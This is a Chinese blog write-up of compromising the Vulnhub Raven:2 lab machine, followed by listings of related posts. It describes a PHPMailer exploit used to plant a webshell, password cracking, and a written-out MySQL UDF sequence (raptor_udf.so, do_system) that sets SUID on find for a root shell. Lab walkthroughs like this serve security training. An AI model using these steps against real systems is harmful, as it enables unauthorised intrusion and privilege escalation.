mysql靶机_[Vulnhub]靶机渗透-Raven:2

最新推荐文章于 2025-03-05 20:35:38 发布
最新推荐文章于 2025-03-05 20:35:38 发布
阅读量318 收藏
点赞数
文章标签: mysql靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42493325/article/details/114353044
版权

0x01 Scan Host

3f7833465794a4d794496309acebb2c4.png

d2416aa4694353584c279da169a07018.png

更加详细地扫描:

a871e64c4d6dddcc0941a4ad79512308.png

0x02 Web Service

还是有个wp,老规矩用wpscan看一下,同时扫描目录。

flag1

dirb扫描出错,所以这里用gobuster:

2d6b41efd4b3aed47d468ee253937660.png

挨个看了下发现了flag1:

33e915555d2b43503a3e940aaa03886e.png

刚好wpscan的结果也出来了,wordpress的版本是4.8.7,主题twentyseven 2.2,大概看了没有什么可利用的洞。

4785f9ec69fea34103c304cd5f4e7cc1.png

再仔细看一下当时扫出的目录,发现有PHPMailer,VERSION:

d1a0e6797499457a9d99389adb54323e.png

看一下有没有Nday:

1c8c0e724e72ae8ff25ac6121da5a0d6.png

选择了40974.py这个POC,做了修改:

8fa3bb99056270f3a39f6f36f4463297.png

首先payload改成了一句话木马,然后target注意contact.php是目标发送email的页面,也是PHPMailer存在漏洞的地方,再一个就是注意第三个框的路径.访问contact.php生成shell:

20b9791bd4d717ba2ed3d9fb308bcda8.png

然后wordpress的后台密码爆破失败。

0x03 SSH Service

使用hydra爆破没出,包括常规字典以及社会工程学字典。

0x04 Privilege Escalation

Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

fdc5d01bd017dc779fdb6e58ca79eed6.png

没看到SUID以及sudo可以利用的东西。

flag2&&flag3

fcf595a1f07dbb504882ebe0dbf5e540.png

还少个flag2,刚才命令查找的目录路径不全面:

find / -name "flag*"

f72e5c7b4d9b65d75fc918dd0c18f1bb.png

现在提权没有头绪,想想还有mysql没有看,看到wp的配置文件是root:

2abbae99ee9e184baa4ce9fd1c3cf22e.png

AntSword导出是csv,所以我们自己导出:

c4c36d5672b99801ec632df5441bbcf9.png

导出后修改为user:pass的格式,然后用john跑一下HASH,还是用rockyou字典。

9e1142c294fbed96b78632e3469f11ce.png

Steven的密码是跑出来了,但是没能成功登陆SSH.

mysql-CVE-2016-6662

这样就很头疼了,最后还剩mysql:

b1d25e7cf043c0f956086fcaf8d79eaf.png

5273edb8a482bdf04b62aff175d9ce56.png

注意…我不小心是mv出来的,尽量cp吧,然后编译一下再编译成动态链接库。

use mysql;

create table foo(line blob);

insert into foo values(load_file('/var/www/html/raptor_udf.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';

create function do_system returns integer soname 'raptor_udf.so';

select * from mysql.func;

select do_system('chmod u+s /usr/bin/find');

其实就是利用这个动态链接库来创建一个自定义函数来执行命令,给find SUID权限,然后利用find提权:

find / -exec "/bin/sh" \;

flag4

但是我这里没交互式shell,用msf直接整个payload丢上去反弹也行,用我之前说过的nc没有-e参数的方法也行。我嫌麻烦就不弄了:

15ba277879509d034ba41f74237b3f4b.png

直接读flag吧,但是建议各位还是走完提权的流程最好。

6b17cbd7d7a17ed2b4675c5b7bceec42.png

靶机mysql数据库_记一次线下赛靶机攻击过程
weixin_39757040的博客
02-07 393
原标题:记一次线下赛靶机攻击过程 本人前几天,刚参加一场线下安全赛,特其中一台靶机攻击过程分享下其中的坑。靶机IP :172.16.1.107Web 访问似乎没什么有价值的东西 Nmap 看下是否有其他收获? 咋一眼看过去除了 80 端口的 web 以为就没其他端口了,尝试着进行全端口扫描发现,还是一样。后来仔细进行 nmap -sV 扫描,还有一个 82 端口,尝试 web 访问。存在一个 uc...
渗透测试靶机---Raven2
久恙502的博客
10-18 217
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Raven: 2靶场渗透测试
最新发布
sucker的博客
03-05 1403
查看/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png得到flag3。分别查看内容,在http://raven.local/vendor/PATH得到flag1。,该参数直接控制 MySQL 的文件导入/导出权限,是防御文件写入攻击(如SQL注入导出WebShell、UDF提权)的关键配置。然后使用path/to/venv/bin/python和path/to/venv/bin/pip。12,这些信息说明MSF提权是不可行的。
Raven 2 靶机渗透
banacyo14206的博客
08-24 1006
0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 提权辅助工具LinEnum下载:https://do...
SQL手工注入(MySQL数据库)详解---靶机(墨者学院)
优快云_caiqian的博客
03-02 4772
SQL手工注入详解一、判断是否存在注入点二、Mysql数据库基本结构三、information_schema 简述 一、判断是否存在注入点 如果页面中MySQL报错,证明该页面中存在SQL注入漏洞: 单引号 ’ ----> 页面错误 and 1=1 ----> 页面正常 and 1=2 ----> 页面错误 二、Mysql数据库基本结构 MYSQL数据库   数据库A=网站A=数据库用户A     表名           列名              
Raven: 2靶机入侵
weixin_30477797的博客
01-30 1134
0x00 前言 Raven 2是一个中等难度的boot2root虚拟靶机。有四个flag需要找出。在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 0x01 存活主机 1.在windows上的scan ports工具对目标整个网段(...
Raven2靶场渗透
一纸荒芜的博客
08-05 751
Raven2靶场渗透
VulnHub-Raven2靶机渗透
ce666666的博客
02-04 3991
前言 通过VulnHub-Raven2靶机渗透学习 攻击机:kali 靶机Raven 网段:192.168.123.0/24 知识点: PHPMailer 小于5.2.18 (CVE-2016-10033) UDF提权 工具: LinEnum——Linux枚举漏洞工具 dirsearch——目录扫描工具 CVE-2016-10033 原理:PHPMailer mail()函数功能,远程攻击者利用默认开启的PHPMailer可以运行构造的恶意代码,无需登录触发该漏洞,从而导致获取系统权限。
Vulnhub_Raven2靶场渗透
weixin_73173934的博客
11-16 643
下载后用虚拟机打开,网络选择NAT模式。
Vulnhub靶机Raven
prettyX的博客
04-05 697
靶机介绍 有4个flag,2种方法获取Root 靶机下载:https://download.vulnhub.com/raven/Raven.ova 开始 1、靶机IP发现,本次靶机的IP为192.168.1.101 arp-scan -l
2021-12-03 kali渗透----Raven靶机
夕阳的街道的博客
12-03 2892
本文章仅供学习和参考! 欢迎交流~ 一、实验题目:kali渗透----Raven靶机 二、实验内容: 1. 信息收集 2. ssh爆破 3. 绕过限制sudo提权 4. wpscan扫描worpress cms 5. PHPMailer远程代码执行getshell 三、环境准备: 1. kali虚拟机:(IP:192.168.112.130) 2. Raven靶机:(IP:192.168.112.137) 四、实验步骤: 1. 信息收集: (1)端口扫描.
oscp推荐的训练靶机raven2渗透过程
07-05
oscp推荐的训练靶机raven2渗透过程
Raven2--靶机渗透--MysqlUDF提权--linux提权
z2560088的博客
02-17 3166
信息搜集 nmap扫描端口和ip 发现80端口,用dirsearch扫描目录 扫描到了vendor和wordpress目录以及contact.php页面 随便看看,找到一个flag,并发现搭建了PHPMail 之前爆出过phpmail的漏洞,我们用kali的searchexploit搜索一下 再根据vender/version文件得知版本号为 开头添加这个 防止乱码 #!/usr/bin/python # -*- coding: utf-8 -*- ...
[B2R]Raven: 2靶机
weixin_43886198的博客
12-13 969
[B2R]Raven: 2 靶场地址 靶场信息 靶场描述 Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach R
Vulnhub系列靶机---Raven2
qq_45953122的博客
10-13 942
用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell。浏览器访问http://192.168.160.47/contact.php生成后门文件。需要提权,chmod修改权限后,再./LinEnum.sh执行。此时,/usr/bin/find 就具备了SUID 权限。
Vulnhub系列靶机-Raven2
来日可期的博客
10-14 823
MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数。MYSQL低于5.5的漏洞可以使用UDF提权,查看mysql的运行权限。发现是mysqld是root权限,查看secure_file_priv的设置发现为空,满足udf提权。通过以上信息可知满足udf提权,直接利用1518进行提权,先搜索1518.c,然后查看其所在位置,并复制到桌面。Web页面中也有发送邮件的位置,这样就对应上了。
vulnhub-Raven2靶场(中)
leo788的博客
03-04 477
通过raven2靶场练习对mysql提权中udf提权的方式的掌握。
Raven2靶机练习
SYJ_361的博客
03-27 2429
本文是对Raven2靶机的练习,通过phpmailer**CVE-2016-10033远程代码执行漏洞利用**进行反弹shell,通过控制mysql,对靶机权限进行提权,最后得到靶机里面的flag文件
vulnhub靶机——RAVEN: 2
qq_44029310的博客
09-12 2491
本文涉及知识点有:靶机环境搭建,dirsearch工具使用,DS_Store信息泄露漏洞,wpscan使用,利用PHPMailer命令执行漏洞获取shell,UDF提权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值